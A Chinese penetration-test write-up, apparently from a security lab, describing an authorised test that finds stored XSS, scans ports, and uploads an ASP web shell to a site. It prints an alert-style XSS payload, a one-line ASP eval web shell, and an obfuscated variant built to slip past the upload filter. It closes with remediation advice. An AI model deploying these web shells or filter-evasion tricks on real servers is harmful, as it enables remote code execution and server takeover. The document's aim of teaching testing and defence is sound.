记一次有意思的文件上传

本文作者：某小六 (Ms08067安全实验室SRSP TEAM)

0x02 Getshell之路

1.寻找漏洞

打开授权测试网站，发现页面功能单一（登记、查询），

登记处存在存储型xss

payload：<svg/onload = alert(1);>

当页面所有的功能模块测试完之后，我们可以扫目录、扫端口

2.御剑梭哈

①.扫目录，线程过高、ip被ban…

②.使用御剑扫描端口，发现此站点开放了许多端口（此工具适用于快速发现目标ip是否开放了很多端口，像下图这种情况，建议拿nmap进行端口扫描，来发现更多开放的端口）（真实ip，未做CDN）

nmap扫描的结果

盲猜ssh口令爆破不出来（超级弱口令爆破工具（自带字典）…

3.测试目的ip其他端口

①.打开 xx.xx.xx.xx:8088 首页长这个样子，啥也没有

②.点击左上角登录按钮，跳转到用户登录页面，测试admin/admin admin/123456 （猜想：用户命名规则、密码组成规则）

③.通过查看网页源代码，查看相关js文件，得到修改密码的url

填写表单并提交，提示如下信息，放弃爆破弱口令…

④.手动创建一个账号【狗头】

然后登录

⑤.找到上传点，测试文件上传

⑥.服务器对上传内容有过滤（发现相关恶意代码，直接拦截），如果直接上传asp 一句话木马（<%eval request("cmd")%>），会被弃包，go不过去

所以这里使用加密的webshell（代码来源百度，现用现搜）

<%Function MorfiCoder(Code)MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"*",vbCrlf)End FunctionExecute MorfiCoder(")/*/z/*/(tseuqer lave")%>

上传成功

⑦.使用蚁剑连接

（ps：或者直接上传冰蝎自带的asp马）

0x03 漏洞危害&&修复

①.漏洞危害

（1）攻击者可通过此漏洞上传恶意脚本文件，对服务器的正常运行造成安全威胁；（2）攻击者可上传可执行的WebShell（如php、jsp、asp类型的木马病毒），或者利用目录跳转上传gif、html、config文件，覆盖原有的系统文件，到达获取系统权限的目的。

②.修复建议

（1）对上传文件格式进行严格校验及安全扫描，防止上传恶意脚本文件；

（2）设置权限限制，禁止上传目录的执行权限；

（3）严格限制可上传的文件类型；

（4）严格限制上传的文件路径。

（5）文件扩展名服务端白名单校验。

（6）文件内容服务端校验。

（7）上传文件重命名。

（8）隐藏上传文件路径。

本文始发于微信公众号（Ms08067安全实验室）：记一次有意思的文件上传